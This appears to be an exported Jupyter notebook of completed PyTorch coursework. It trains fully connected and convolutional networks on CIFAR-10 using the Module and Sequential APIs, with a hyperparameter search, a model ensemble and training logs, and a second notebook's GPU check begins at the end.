fc_w = random_weight((16*32*32, 10))
fc_b = zero_weight((10,))
################################################################################
# END OF YOUR CODE #
################################################################################
params = [conv_w1, conv_b1, conv_w2, conv_b2, fc_w, fc_b]
train_part2(three_layer_convnet, params, learning_rate)
###Output
Iteration 0, loss = 2.8836
Checking accuracy on the val set
Got 119 / 1000 correct (11.90%)
Iteration 100, loss = 1.8933
Checking accuracy on the val set
Got 367 / 1000 correct (36.70%)
Iteration 200, loss = 1.5477
Checking accuracy on the val set
Got 407 / 1000 correct (40.70%)
Iteration 300, loss = 1.7207
Checking accuracy on the val set
Got 427 / 1000 correct (42.70%)
Iteration 400, loss = 1.6164
Checking accuracy on the val set
Got 425 / 1000 correct (42.50%)
Iteration 500, loss = 1.6501
Checking accuracy on the val set
Got 454 / 1000 correct (45.40%)
Iteration 600, loss = 1.4735
Checking accuracy on the val set
Got 453 / 1000 correct (45.30%)
Iteration 700, loss = 1.4796
Checking accuracy on the val set
Got 471 / 1000 correct (47.10%)
After final iteration:
Checking accuracy on the val set
Got 489 / 1000 correct (48.90%)
###Markdown
Part III. PyTorch Module API

Barebone PyTorch requires that we track all the parameter tensors by hand. This is fine for small networks with a few tensors, but it would be extremely inconvenient and error-prone to track tens or hundreds of tensors in larger networks.

PyTorch provides the `nn.Module` API for you to define arbitrary network architectures, while tracking every learnable parameter for you. In Part II, we implemented SGD ourselves. PyTorch also provides the `torch.optim` package that implements all the common optimizers, such as RMSProp, Adagrad, and Adam. It even supports approximate second-order methods like L-BFGS! You can refer to the [doc](http://pytorch.org/docs/master/optim.html) for the exact specifications of each optimizer.

To use the Module API, follow the steps below:

1. Subclass `nn.Module`. Give your network class an intuitive name like `TwoLayerFC`.
2. In the constructor `__init__()`, define all the layers you need as class attributes. Layer objects like `nn.Linear` and `nn.Conv2d` are themselves `nn.Module` subclasses and contain learnable parameters, so that you don't have to instantiate the raw tensors yourself. `nn.Module` will track these internal parameters for you. Refer to the [doc](http://pytorch.org/docs/master/nn.html) to learn more about the dozens of builtin layers. **Warning**: don't forget to call the `super().__init__()` first!
3. In the `forward()` method, define the *connectivity* of your network. You should use the attributes defined in `__init__` as function calls that take tensor as input and output the "transformed" tensor. Do *not* create any new layers with learnable parameters in `forward()`! All of them must be declared upfront in `__init__`.

After you define your Module subclass, you can instantiate it as an object and call it just like the NN forward function in part II.

Module API: Two-Layer Network

Here is a concrete example of a 2-layer fully connected network:
###Code
class TwoLayerFC(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super().__init__()
# assign layer objects to class attributes
self.fc1 = nn.Linear(input_size, hidden_size)
# nn.init package contains convenient initialization methods
# http://pytorch.org/docs/master/nn.html#torch-nn-init
nn.init.kaiming_normal_(self.fc1.weight)
self.fc2 = nn.Linear(hidden_size, num_classes)
nn.init.kaiming_normal_(self.fc2.weight)
def forward(self, x):
# forward always defines connectivity
x = flatten(x)
scores = self.fc2(F.relu(self.fc1(x)))
return scores
def test_TwoLayerFC():
input_size = 50
x = torch.zeros((64, input_size), dtype=dtype) # minibatch size 64, feature dimension 50
model = TwoLayerFC(input_size, 42, 10)
scores = model(x)
print(scores.size()) # you should see [64, 10]
test_TwoLayerFC()
###Output
torch.Size([64, 10])
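###Markdown
As a quick aside (not part of the original assignment), `nn.Module` registers the parameters of every layer declared in `__init__`; a minimal sketch to inspect them:
###Code
model = TwoLayerFC(50, 42, 10)
for name, p in model.named_parameters():
    print(name, tuple(p.shape)) # e.g. fc1.weight (42, 50), fc1.bias (42,)
###Output
_____no_output_____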
###Markdown
Module API: Three-Layer ConvNet

It's your turn to implement a 3-layer ConvNet followed by a fully connected layer. The network architecture should be the same as in Part II:

1. Convolutional layer with `channel_1` 5x5 filters with zero-padding of 2
2. ReLU
3. Convolutional layer with `channel_2` 3x3 filters with zero-padding of 1
4. ReLU
5. Fully-connected layer to `num_classes` classes

You should initialize the weight matrices of the model using the Kaiming normal initialization method.

**HINT**: http://pytorch.org/docs/stable/nn.html#conv2d

After you implement the three-layer ConvNet, the `test_ThreeLayerConvNet` function will run your implementation; it should print `(64, 10)` for the shape of the output scores.
###Code
class ThreeLayerConvNet(nn.Module):
def __init__(self, in_channel, channel_1, channel_2, num_classes):
super().__init__()
########################################################################
# TODO: Set up the layers you need for a three-layer ConvNet with the #
# architecture defined above. #
########################################################################
self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=channel_1,
kernel_size=(5, 5), padding=2, bias=True)
nn.init.kaiming_normal_(self.conv1.weight)
nn.init.constant_(self.conv1.bias, 0)
self.conv2 = nn.Conv2d(in_channels=channel_1, out_channels=channel_2,
kernel_size=(3, 3), padding=1, bias=True)
nn.init.kaiming_normal_(self.conv2.weight)
nn.init.constant_(self.conv2.bias, 0)
        self.fc = nn.Linear(in_features=channel_2 * 32 * 32,
                            out_features=num_classes, bias=True)
nn.init.kaiming_normal_(self.fc.weight)
nn.init.constant_(self.fc.bias, 0)
########################################################################
# END OF YOUR CODE #
########################################################################
def forward(self, x):
scores = None
########################################################################
# TODO: Implement the forward function for a 3-layer ConvNet. you #
# should use the layers you defined in __init__ and specify the #
# connectivity of those layers in forward() #
########################################################################
scores = F.relu(self.conv1(x))
scores = F.relu(self.conv2(scores))
scores = self.fc(flatten(scores))
########################################################################
# END OF YOUR CODE #
########################################################################
return scores
def test_ThreeLayerConvNet():
x = torch.zeros((64, 3, 32, 32), dtype=dtype) # minibatch size 64, image size [3, 32, 32]
model = ThreeLayerConvNet(in_channel=3, channel_1=12, channel_2=8, num_classes=10)
scores = model(x)
print(scores.size()) # you should see [64, 10]
test_ThreeLayerConvNet()
###Output
torch.Size([64, 10])
###Markdown
Module API: Check AccuracyGiven the validation or test set, we can check the classification accuracy of a neural network. This version is slightly different from the one in part II. You don't manually pass in the parameters anymore.
###Code
def check_accuracy_part34(loader, model):
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
num_correct = 0
num_samples = 0
model.eval() # set model to evaluation mode
with torch.no_grad():
for x, y in loader:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
###Output
_____no_output_____
###Markdown
Module API: Training LoopWe also use a slightly different training loop. Rather than updating the values of the weights ourselves, we use an Optimizer object from the `torch.optim` package, which abstracts the notion of an optimization algorithm and provides implementations of most of the algorithms commonly used to optimize neural networks.
###Code
def train_part34(model, optimizer, epochs=1):
"""
Train a model on CIFAR-10 using the PyTorch Module API.
Inputs:
- model: A PyTorch Module giving the model to train.
- optimizer: An Optimizer object we will use to train the model
- epochs: (Optional) A Python integer giving the number of epochs to train for
Returns: Nothing, but prints model accuracies during training.
"""
model = model.to(device=device) # move the model parameters to CPU/GPU
for e in range(epochs):
#print(f'Epoch number {e}')
for t, (x, y) in enumerate(loader_train):
model.train() # put model to training mode
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
loss = F.cross_entropy(scores, y)
# Zero out all of the gradients for the variables which the optimizer
# will update.
optimizer.zero_grad()
# This is the backwards pass: compute the gradient of the loss with
# respect to each parameter of the model.
loss.backward()
# Actually update the parameters of the model using the gradients
# computed by the backwards pass.
optimizer.step()
if t % print_every == 0:
print('Iteration %d, loss = %.4f' % (t, loss.item()))
check_accuracy_part34(loader_val, model)
print()
###Output
_____no_output_____
###Markdown
Module API: Train a Two-Layer NetworkNow we are ready to run the training loop. In contrast to part II, we don't explicitly allocate parameter tensors anymore.Simply pass the input size, hidden layer size, and number of classes (i.e. output size) to the constructor of `TwoLayerFC`. You also need to define an optimizer that tracks all the learnable parameters inside `TwoLayerFC`.You don't need to tune any hyperparameters, but you should see model accuracies above 40% after training for one epoch.
###Code
hidden_layer_size = 4000
learning_rate = 1e-2
model = TwoLayerFC(3 * 32 * 32, hidden_layer_size, 10)
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
train_part34(model, optimizer)
###Output
Iteration 0, loss = 3.0983
Checking accuracy on validation set
got 130 / 1000 correct (13.00)
Iteration 700, loss = 1.7910
Checking accuracy on validation set
got 443 / 1000 correct (44.30)
###Markdown
Module API: Train a Three-Layer ConvNetYou should now use the Module API to train a three-layer ConvNet on CIFAR. This should look very similar to training the two-layer network! You don't need to tune any hyperparameters, but you should achieve accuracy above 45% after training for one epoch.You should train the model using stochastic gradient descent without momentum.
###Code
learning_rate = 3e-3
channel_1 = 32
channel_2 = 16
model = None
optimizer = None
################################################################################
# TODO: Instantiate your ThreeLayerConvNet model and a corresponding optimizer #
################################################################################
model = ThreeLayerConvNet(3, channel_1, channel_2, 10)
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
################################################################################
# END OF YOUR CODE
################################################################################
train_part34(model, optimizer)
###Output
Iteration 0, loss = 2.8415
Checking accuracy on validation set
got 128 / 1000 correct (12.80)
Iteration 700, loss = 1.4418
Checking accuracy on validation set
got 482 / 1000 correct (48.20)
###Markdown
Part IV. PyTorch Sequential APIPart III introduced the PyTorch Module API, which allows you to define arbitrary learnable layers and their connectivity. For simple models like a stack of feed-forward layers, you still need to go through 3 steps: subclass `nn.Module`, assign layers to class attributes in `__init__`, and call each layer one by one in `forward()`. Is there a more convenient way? Fortunately, PyTorch provides a container Module called `nn.Sequential`, which merges the above steps into one. It is not as flexible as `nn.Module`, because you cannot specify a more complex topology than a feed-forward stack, but it's good enough for many use cases. Sequential API: Two-Layer NetworkLet's see how to rewrite our two-layer fully connected network example with `nn.Sequential`, and train it using the training loop defined above.Again, you don't need to tune any hyperparameters here, but you should achieve above 40% accuracy after one epoch of training.
###Code
# We need to wrap `flatten` function in a module in order to stack it
# in nn.Sequential
class Flatten(nn.Module):
def forward(self, x):
return flatten(x)
hidden_layer_size = 4000
learning_rate = 1e-2
model = nn.Sequential(
Flatten(),
nn.Linear(3 * 32 * 32, hidden_layer_size),
nn.ReLU(),
nn.Linear(hidden_layer_size, 10),
)
# you can use Nesterov momentum in optim.SGD
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=0.9, nesterov=True)
train_part34(model, optimizer)
###Output
Iteration 0, loss = 2.2709
Checking accuracy on validation set
got 152 / 1000 correct (15.20)
Iteration 700, loss = 1.8989
Checking accuracy on validation set
got 435 / 1000 correct (43.50)
###Markdown
Sequential API: Three-Layer ConvNetHere you should use `nn.Sequential` to define and train a three-layer ConvNet with the same architecture we used in Part III:1. Convolutional layer (with bias) with 32 5x5 filters, with zero-padding of 22. ReLU3. Convolutional layer (with bias) with 16 3x3 filters, with zero-padding of 14. ReLU5. Fully-connected layer (with bias) to compute scores for 10 classesYou should initialize your weight matrices using the `random_weight` function defined above, and you should initialize your bias vectors using the `zero_weight` function above.You should optimize your model using stochastic gradient descent with Nesterov momentum 0.9.Again, you don't need to tune any hyperparameters but you should see accuracy above 55% after one epoch of training.
###Code
channel_1 = 32
channel_2 = 16
learning_rate = 1e-2
model = None
optimizer = None
################################################################################
# TODO: Rewrite the three-layer ConvNet with bias from Part III with the      #
# Sequential API. #
################################################################################
model = nn.Sequential(
nn.Conv2d(3, channel_1, (5,5), padding=2),
nn.ReLU(),
nn.Conv2d(channel_1, channel_2, (3,3), padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(channel_2*32*32, 10)
)
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=0.9, nesterov=True)
################################################################################
# END OF YOUR CODE
################################################################################
train_part34(model, optimizer)
###Output
Iteration 0, loss = 2.3103
Checking accuracy on validation set
got 102 / 1000 correct (10.20)
Iteration 700, loss = 0.9798
Checking accuracy on validation set
got 592 / 1000 correct (59.20)
###Markdown
Part V. CIFAR-10 open-ended challengeIn this section, you can experiment with whatever ConvNet architecture you'd like on CIFAR-10. Now it's your job to experiment with architectures, hyperparameters, loss functions, and optimizers to train a model that achieves **at least 70%** accuracy on the CIFAR-10 **validation** set within 10 epochs. You can use the check_accuracy and train functions from above. You can use either the `nn.Module` or `nn.Sequential` API. Describe what you did at the end of this notebook.Here is the official API documentation for each component. One note: what we call in the class "spatial batch norm" is called "BatchNorm2D" in PyTorch.* Layers in torch.nn package: http://pytorch.org/docs/stable/nn.html * Activations: http://pytorch.org/docs/stable/nn.html#non-linear-activations * Loss functions: http://pytorch.org/docs/stable/nn.html#loss-functions * Optimizers: http://pytorch.org/docs/stable/optim.html Things you might try:- **Filter size**: Above we used 5x5; would smaller filters be more efficient?- **Number of filters**: Above we used 32 filters. Do more or fewer do better?- **Pooling vs Strided Convolution**: Do you use max pooling or just strided convolutions?- **Batch normalization**: Try adding spatial batch normalization after convolution layers and vanilla batch normalization after affine layers. Do your networks train faster?- **Network architecture**: The networks above have only a few layers of trainable parameters. Can you do better with a deep network? Good architectures to try include: - [conv-relu-pool]xN -> [affine]xM -> [softmax or SVM] - [conv-relu-conv-relu-pool]xN -> [affine]xM -> [softmax or SVM] - [batchnorm-relu-conv]xN -> [affine]xM -> [softmax or SVM]- **Global Average Pooling**: Instead of flattening and then having multiple affine layers, perform convolutions until your image gets small (7x7 or so) and then perform an average pooling operation to get a 1x1 feature map per filter (shape (1, 1, Filters)), which is then reshaped into a (Filters,) vector; a minimal sketch appears right before the next code cell. This is used in [Google's Inception Network](https://arxiv.org/abs/1512.00567) (See Table 1 for their architecture).- **Regularization**: Add L2 weight regularization, or perhaps use Dropout. Tips for trainingFor each network architecture that you try, you should tune the learning rate and other hyperparameters. When doing this there are a couple of important things to keep in mind:- If the parameters are working well, you should see improvement within a few hundred iterations- Remember the coarse-to-fine approach for hyperparameter tuning: start by testing a large range of hyperparameters for just a few training iterations to find the combinations of parameters that are working at all.- Once you have found some sets of parameters that seem to work, search more finely around these parameters. You may need to train for more epochs.- You should use the validation set for hyperparameter search, and save your test set for evaluating your architecture on the best parameters as selected by the validation set. Going above and beyondIf you are feeling adventurous there are many other features you can implement to try and improve your performance. 
You are **not required** to implement any of these, but don't miss the fun if you have time!- Alternative optimizers: you can try Adam, Adagrad, RMSprop, etc.- Alternative activation functions such as leaky ReLU, parametric ReLU, ELU, or MaxOut.- Model ensembles- Data augmentation- New Architectures - [ResNets](https://arxiv.org/abs/1512.03385) where the input from the previous layer is added to the output. - [DenseNets](https://arxiv.org/abs/1608.06993) where inputs from previous layers are concatenated together. - [This blog has an in-depth overview](https://chatbotslife.com/resnets-highwaynets-and-densenets-oh-my-9bb15918ee32) Have fun and happy training!
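Before moving on, here is a minimal sketch of the Global Average Pooling idea from the tips above (an illustration under stated assumptions, not a prescribed solution): it reuses the `Flatten` module defined in Part IV and PyTorch's `nn.AdaptiveAvgPool2d`, which averages each channel down to a 1x1 map.
###Code
# A minimal Global Average Pooling sketch (illustration only; assumes `nn` and
# the `Flatten` module defined earlier are in scope).
gap_model = nn.Sequential(
    nn.Conv2d(3, 32, (3, 3), padding=1, stride=2),   # output size 32 x 16 x 16
    nn.ReLU(),
    nn.Conv2d(32, 64, (3, 3), padding=1, stride=2),  # output size 64 x 8 x 8
    nn.ReLU(),
    nn.AdaptiveAvgPool2d((1, 1)),                    # output size 64 x 1 x 1
    Flatten(),                                       # one value per filter -> (64,) vector
    nn.Linear(64, 10),                               # tiny classifier head
)
###Output
_____no_output_____
###Markdown
Because the pooled vector has exactly one entry per filter, the fully-connected head stays small regardless of input resolution; this is the design choice the Inception architecture linked above exploits.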
###Code
import copy

def check_accuracy(loader, model):
num_correct = 0
num_samples = 0
model.eval() # set model to evaluation mode
with torch.no_grad():
for x, y in loader:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
return float(num_correct) / num_samples
def train(model, optimizer, print_every=700, epochs=3, verbose=False):
model = model.to(device=device) # move the model parameters to CPU/GPU
    best_val_acc = 0.7  # only snapshot models that reach the 70% target
    model_hist = {}     # maps validation accuracy -> model snapshot
for e in range(epochs):
if verbose or print_every==-1:
print(f'Epoch number {e+1}')
for t, (x, y) in enumerate(loader_train):
model.train() # put model to training mode
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
loss = F.cross_entropy(scores, y)
# Zero out all of the gradients for the variables which the optimizer
# will update.
optimizer.zero_grad()
# This is the backwards pass: compute the gradient of the loss with
# respect to each parameter of the model.
loss.backward()
# Actually update the parameters of the model using the gradients
# computed by the backwards pass.
optimizer.step()
if (print_every == -1 and t==len(loader_train)-1) or (verbose and t % print_every == 0):
with torch.no_grad():
_, preds = scores.max(1)
tr_acc = float(torch.sum(preds==y)) / len(y)
val_acc = check_accuracy(loader_val, model)
print('Iteration %d, loss = %.4f' % (t, loss.item()))
print(f' training accuracy = {tr_acc:.4f}\nvalidation accuracy = {val_acc:.4f}')
print()
cur_val_acc = check_accuracy(loader_val, model)
        if best_val_acc <= cur_val_acc:
            best_val_acc = cur_val_acc
            # snapshot the weights rather than storing a reference to the live
            # model, so model_hist holds distinct checkpoints for the ensemble
            model_hist[cur_val_acc] = copy.deepcopy(model)
return model_hist
################################################################################
# TODO: #
# Experiment with any architectures, optimizers, and hyperparameters. #
# Achieve AT LEAST 70% accuracy on the *validation set* within 10 epochs. #
# #
# Note that you can use the check_accuracy function to evaluate on either #
# the test set or the validation set, by passing either loader_test or #
# loader_val as the second argument to check_accuracy. You should not touch #
# the test set until you have finished your architecture and hyperparameter #
# tuning, and only run the test set once at the end to report a final value. #
################################################################################
#lr = 1e-3
def init_weights(m):
if type(m)==nn.Linear:
nn.init.kaiming_normal_(m.weight)
print_every = 700
best_model, best_acc = None, -1
arange = [10**(-i) for i in range(10)]
# 7.5e-4
# 1.8e-3
for _ in range(10):
lr, reg = np.random.uniform(1e-3 * 0.9, 1e-3 * 1.5), np.random.uniform(1e-4, 10e-4)
#lr, reg = 1.5e-4, 1e-4
model = nn.Sequential(
nn.BatchNorm2d(3),
nn.ReLU(),
nn.Conv2d(3, 64, (11,11), padding=5, stride=2), # output size 64 x 16 x 16
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 48, (7,7), padding=3), # output size 48 x 16 x 16
nn.MaxPool2d(2), # output size 48 x 8 x 8
nn.BatchNorm2d(48),
nn.ReLU(),
nn.Conv2d(48, 32, (5,5), padding=2), # output size 32 x 8 x 8
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 16, (3,3), padding=1), # output size 16 x 8 x 8
nn.MaxPool2d(2), # output size 16 x 4 x 4
Flatten(),
nn.Linear(16*4*4, 16*2*2),
nn.ReLU(),
nn.Linear(16*2*2, 10)
)
model.apply(init_weights)
optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=reg)
train(model, optimizer, epochs=10, verbose=True)
print(f'\nlearning rate {lr:e} weight decay {reg:e} ')
acc = check_accuracy(loader_val, model)
print(f'validation accuracy {acc:.4f}\n')
if best_acc < acc:
best_acc = acc
best_model = model
print('\ndone!')
################################################################################
# END OF YOUR CODE
################################################################################
# You should get at least 70% accuracy
#train_part34(model, optimizer, epochs=10)
###Output
Epoch number 1
Iteration 0, loss = 2.3001
training accuracy = 0.0781
validation accuracy = 0.1070
Iteration 700, loss = 1.5165
training accuracy = 0.5312
validation accuracy = 0.5410
Epoch number 2
Iteration 0, loss = 1.1771
training accuracy = 0.5156
validation accuracy = 0.5170
Iteration 700, loss = 1.2007
training accuracy = 0.5625
validation accuracy = 0.6020
Epoch number 3
Iteration 0, loss = 0.9873
training accuracy = 0.6562
validation accuracy = 0.6240
Iteration 700, loss = 1.0352
training accuracy = 0.5938
validation accuracy = 0.5990
Epoch number 4
Iteration 0, loss = 0.9708
training accuracy = 0.6562
validation accuracy = 0.6000
Iteration 700, loss = 0.6899
training accuracy = 0.7344
validation accuracy = 0.6850
Epoch number 5
Iteration 0, loss = 0.8157
training accuracy = 0.7188
validation accuracy = 0.6600
Iteration 700, loss = 0.9030
training accuracy = 0.6719
validation accuracy = 0.6800
Epoch number 6
Iteration 0, loss = 0.6646
training accuracy = 0.7969
validation accuracy = 0.7000
Iteration 700, loss = 0.7174
training accuracy = 0.7656
validation accuracy = 0.7060
Epoch number 7
Iteration 0, loss = 0.8550
training accuracy = 0.7500
validation accuracy = 0.6620
Iteration 700, loss = 0.8328
training accuracy = 0.6094
validation accuracy = 0.6990
Epoch number 8
Iteration 0, loss = 0.4741
training accuracy = 0.8281
validation accuracy = 0.6870
Iteration 700, loss = 1.0313
training accuracy = 0.6094
validation accuracy = 0.7110
Epoch number 9
Iteration 0, loss = 0.5490
training accuracy = 0.7969
validation accuracy = 0.7030
Iteration 700, loss = 0.6466
training accuracy = 0.7812
validation accuracy = 0.7280
Epoch number 10
Iteration 0, loss = 0.7034
training accuracy = 0.7969
validation accuracy = 0.6750
Iteration 700, loss = 0.5950
training accuracy = 0.7812
validation accuracy = 0.7030
learning rate 1.029322e-03 weight decay 6.013453e-04
validation accuracy 0.7030
Epoch number 1
Iteration 0, loss = 2.3413
training accuracy = 0.1250
validation accuracy = 0.0960
Iteration 700, loss = 1.3834
training accuracy = 0.5000
validation accuracy = 0.5200
Epoch number 2
Iteration 0, loss = 1.4109
training accuracy = 0.5156
validation accuracy = 0.5420
Iteration 700, loss = 1.0116
training accuracy = 0.6094
validation accuracy = 0.6200
Epoch number 3
Iteration 0, loss = 0.9819
training accuracy = 0.7031
validation accuracy = 0.5790
Iteration 700, loss = 0.7005
training accuracy = 0.7500
validation accuracy = 0.6280
Epoch number 4
Iteration 0, loss = 0.8674
training accuracy = 0.7188
validation accuracy = 0.5830
Iteration 700, loss = 0.8991
training accuracy = 0.6719
validation accuracy = 0.6300
Epoch number 5
Iteration 0, loss = 0.7653
training accuracy = 0.7188
validation accuracy = 0.6710
Iteration 700, loss = 0.8980
training accuracy = 0.6562
validation accuracy = 0.6680
Epoch number 6
Iteration 0, loss = 0.5811
training accuracy = 0.8125
validation accuracy = 0.6710
Iteration 700, loss = 0.6955
training accuracy = 0.7812
validation accuracy = 0.7070
Epoch number 7
Iteration 0, loss = 0.7687
training accuracy = 0.7344
validation accuracy = 0.6270
Iteration 700, loss = 0.8199
training accuracy = 0.7031
validation accuracy = 0.6850
Epoch number 8
Iteration 0, loss = 0.7214
training accuracy = 0.7500
validation accuracy = 0.6820
Iteration 700, loss = 0.8504
training accuracy = 0.6250
validation accuracy = 0.6860
Epoch number 9
Iteration 0, loss = 0.5765
training accuracy = 0.8281
validation accuracy = 0.6930
Iteration 700, loss = 0.5571
training accuracy = 0.8281
validation accuracy = 0.6890
Epoch number 10
Iteration 0, loss = 0.4134
training accuracy = 0.8438
validation accuracy = 0.6930
Iteration 700, loss = 0.8280
training accuracy = 0.7812
validation accuracy = 0.6810
learning rate 1.173845e-03 weight decay 3.534350e-04
validation accuracy 0.7080
Epoch number 1
Iteration 0, loss = 2.3126
training accuracy = 0.0938
validation accuracy = 0.1050
Iteration 700, loss = 1.0690
training accuracy = 0.6250
validation accuracy = 0.4880
Epoch number 2
Iteration 0, loss = 1.2379
training accuracy = 0.5312
validation accuracy = 0.5560
Iteration 700, loss = 1.0571
training accuracy = 0.6250
validation accuracy = 0.5960
Epoch number 3
Iteration 0, loss = 0.9475
training accuracy = 0.7188
validation accuracy = 0.5820
Iteration 700, loss = 1.1188
training accuracy = 0.6406
validation accuracy = 0.6150
Epoch number 4
Iteration 0, loss = 0.8721
training accuracy = 0.7812
validation accuracy = 0.6670
Iteration 700, loss = 0.9538
training accuracy = 0.7031
validation accuracy = 0.6500
Epoch number 5
Iteration 0, loss = 0.7811
training accuracy = 0.6719
validation accuracy = 0.6510
Iteration 700, loss = 0.7254
training accuracy = 0.7344
validation accuracy = 0.6590
Epoch number 6
Iteration 0, loss = 0.7479
training accuracy = 0.7500
validation accuracy = 0.6780
Iteration 700, loss = 0.7734
training accuracy = 0.7344
validation accuracy = 0.6880
Epoch number 7
Iteration 0, loss = 0.8073
training accuracy = 0.7500
validation accuracy = 0.6720
Iteration 700, loss = 0.6575
training accuracy = 0.7969
validation accuracy = 0.6630
Epoch number 8
Iteration 0, loss = 0.6770
training accuracy = 0.7969
validation accuracy = 0.6600
Iteration 700, loss = 0.6271
training accuracy = 0.7344
validation accuracy = 0.7040
Epoch number 9
Iteration 0, loss = 0.6725
training accuracy = 0.7969
validation accuracy = 0.6910
Iteration 700, loss = 0.8680
training accuracy = 0.6719
validation accuracy = 0.6970
Epoch number 10
Iteration 0, loss = 0.5718
training accuracy = 0.7812
validation accuracy = 0.7060
Iteration 700, loss = 0.5898
training accuracy = 0.8125
validation accuracy = 0.6380
learning rate 1.339509e-03 weight decay 8.640335e-04
validation accuracy 0.7110
Epoch number 1
Iteration 0, loss = 2.2951
training accuracy = 0.2031
validation accuracy = 0.1130
Iteration 700, loss = 1.4657
training accuracy = 0.4844
validation accuracy = 0.5210
Epoch number 2
Iteration 0, loss = 1.1688
training accuracy = 0.6250
validation accuracy = 0.5210
Iteration 700, loss = 1.1031
training accuracy = 0.6094
validation accuracy = 0.5950
Epoch number 3
Iteration 0, loss = 0.9336
training accuracy = 0.6250
validation accuracy = 0.5870
Iteration 700, loss = 0.9488
training accuracy = 0.6562
validation accuracy = 0.6400
Epoch number 4
Iteration 0, loss = 0.8541
training accuracy = 0.6875
validation accuracy = 0.6600
Iteration 700, loss = 0.8948
training accuracy = 0.6250
validation accuracy = 0.6530
Epoch number 5
Iteration 0, loss = 0.7268
training accuracy = 0.7812
validation accuracy = 0.6790
Iteration 700, loss = 0.9360
training accuracy = 0.6406
validation accuracy = 0.6640
Epoch number 6
Iteration 0, loss = 0.7047
training accuracy = 0.7812
validation accuracy = 0.6990
Iteration 700, loss = 0.8533
training accuracy = 0.7031
validation accuracy = 0.6740
Epoch number 7
Iteration 0, loss = 0.6924
training accuracy = 0.7500
validation accuracy = 0.6660
Iteration 700, loss = 0.7955
training accuracy = 0.7031
validation accuracy = 0.6600
Epoch number 8
Iteration 0, loss = 0.9113
training accuracy = 0.7812
validation accuracy = 0.6750
Iteration 700, loss = 0.6279
training accuracy = 0.7969
validation accuracy = 0.7100
Epoch number 9
Iteration 0, loss = 0.6390
training accuracy = 0.7812
validation accuracy = 0.7070
Iteration 700, loss = 0.7873
training accuracy = 0.7344
validation accuracy = 0.6880
Epoch number 10
Iteration 0, loss = 0.4615
training accuracy = 0.7969
validation accuracy = 0.6720
Iteration 700, loss = 0.5586
training accuracy = 0.8281
validation accuracy = 0.6980
learning rate 1.282588e-03 weight decay 4.741023e-04
validation accuracy 0.7030
Epoch number 1
Iteration 0, loss = 2.6395
training accuracy = 0.1250
validation accuracy = 0.1070
Iteration 700, loss = 1.5005
training accuracy = 0.5469
validation accuracy = 0.5150
Epoch number 2
Iteration 0, loss = 1.3631
training accuracy = 0.5156
validation accuracy = 0.5420
Iteration 700, loss = 0.9643
training accuracy = 0.6562
validation accuracy = 0.6210
###Markdown
Describe what you did In the cell below you should write an explanation of what you did, any additional features that you implemented, and/or any graphs that you made in the process of training and evaluating your network. TODO: Describe what you did
###Code
model = nn.Sequential(
nn.BatchNorm2d(3),
nn.ReLU(),
nn.Conv2d(3, 16, (11,11), padding=5), # output size 16 * 32 * 32
nn.MaxPool2d(2), # output size 16 * 16 * 16
nn.BatchNorm2d(16),
nn.ReLU(),
nn.Conv2d(16, 32, (7,7), padding=3), # output size 32 x 16 x 16
nn.MaxPool2d(2), # output size 32 x 8 x 8
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 64, (5,5), padding=2), # output size 64 * 8 * 8
nn.MaxPool2d(2), # output size 64 * 4 * 4
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 128, (3,3), padding=1), # output size 128 * 4 * 4
nn.MaxPool2d(2), # output size 128 * 2 * 2
Flatten(),
nn.Linear(128*2*2, 64),
nn.ReLU(),
nn.Dropout(p=0.4),
nn.Linear(64, 128),
nn.ReLU(),
nn.Dropout(p=0.4),
nn.Linear(128, 256),
nn.ReLU(),
nn.Dropout(p=0.4),
nn.Linear(256, 10)
)
model.apply(init_weights)
optimizer = optim.Adam(model.parameters(), lr=1e-03, weight_decay=2e-03)
model_hist = train(model, optimizer, print_every=-1, epochs=60, verbose=False)
check_accuracy(loader_val, model)
class Ensemble(nn.Module):
    def __init__(self, models):
        super().__init__()  # required before setting attributes on an nn.Module
        # dict of {val_acc: model}; dict-stored models are not registered
        # submodules, so .eval()/.to() must be applied to each model separately
        self.models = models
    def forward(self, x):
        # average the logits of all member models
        scores = torch.mean(torch.stack([a(x) for a in self.models.values()]), dim=0)
        return scores
print(f'Ensemble of {len(model_hist)} models with the following validation accuracies:')
print(*model_hist.keys(), sep='\n')
model = Ensemble(model_hist)
#check_accuracy(loader_val, model)
num_correct = 0
num_samples = 0
with torch.no_grad():
for x, y in loader_val:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model.forward(x)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
print(float(num_correct) / num_samples)
###Output
0.688
###Markdown
Test set -- run this only onceNow that we've gotten a result we're happy with, we test our final model on the test set (which you should store in best_model). Think about how this compares to your validation set accuracy.
###Code
check_accuracy(loader_test, model)
###Output
_____no_output_____
notebook/06t-efficientnet_b4_ns-512.ipynb.ipynb | ###Markdown
GPU
###Code
gpu_info = !nvidia-smi
gpu_info = '\n'.join(gpu_info)
print(gpu_info)
###Output
Wed Jan 13 05:09:48 2021
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 460.27.04 Driver Version: 418.67 CUDA Version: 10.1 |
